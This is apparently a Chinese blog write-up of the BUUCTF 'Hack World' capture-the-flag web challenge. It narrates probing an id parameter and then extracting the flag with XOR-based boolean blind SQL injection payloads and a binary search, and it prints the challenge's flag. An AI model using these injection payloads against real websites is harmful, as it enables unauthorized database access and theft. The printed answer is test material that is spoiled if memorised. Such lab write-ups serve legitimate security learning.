buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

1.根据提示,说明flag在表里
在这里插入图片描述

2.那就猜测存在sql注入,反手测试一波id=1'
在这里插入图片描述
3.尝试使用1'--+进行注释
在这里插入图片描述
4.直接丢进salmap里吧,不出意外多半是跑不出来
在这里插入图片描述
5.直接放入fuzz里进行测试
在这里插入图片描述
6.发现当我们使用异或时,出现了提示
Hello, glzjin wants a girlfriend.

在这里插入图片描述
7.那我们就按照这个思路进行注入
异或异或,相同为0,不同为1

在这里插入图片描述
在这里插入图片描述
8.判断数据库的长度

0^(length(database())>0)

在这里插入图片描述

0^(length(database())>16)

在这里插入图片描述
9.使用折半查找的方式进行测试
在这里插入图片描述

0^(length(database())>13)

在这里插入图片描述

0^(length(database())>10)

在这里插入图片描述

0^(length(database())>11)

在这里插入图片描述
10.说明数据库的长度为11

0^(length(database())=11)

在这里插入图片描述
12.判断数据库名

0^(ascii(substr(database(),1,1))>80)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>100)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>90)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>95)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>97)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>98)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>99)

在这里插入图片描述

id=0^(ascii(substr(database(),1,1))=99)

在这里插入图片描述

中间的折磨了好久想爆破数据库的表名,走啦好多的弯路,可以直接出来的

0^(ascii(substr((select(flag)from(flag)),{},1))>{})

在这里插入图片描述

flag{bcc3af9d-a5ee-4395-a540-ffb516eaba15}

在这里插入图片描述

相关推荐

  1. <span style='color:red;'>Web</span> <span style='color:red;'>Day</span><span style='color:red;'>2</span>

    Web Day2

    2024-04-23 08:00:07      33 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-04-23 08:00:07       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-23 08:00:07       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-04-23 08:00:07       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-04-23 08:00:07       18 阅读

热门阅读

  1. 资料总结分享:临床重要数据库

    2024-04-23 08:00:07       13 阅读
  2. 可信通信(TLS/SSL协议)

    2024-04-23 08:00:07       13 阅读
  3. <基础数学> 平面向量基本定理

    2024-04-23 08:00:07       10 阅读
  4. 数学分析复习:中值定理、反函数定理

    2024-04-23 08:00:07       15 阅读
  5. linux系统安装docker-compose

    2024-04-23 08:00:07       12 阅读
  6. Stable Diffusion模型介绍

    2024-04-23 08:00:07       14 阅读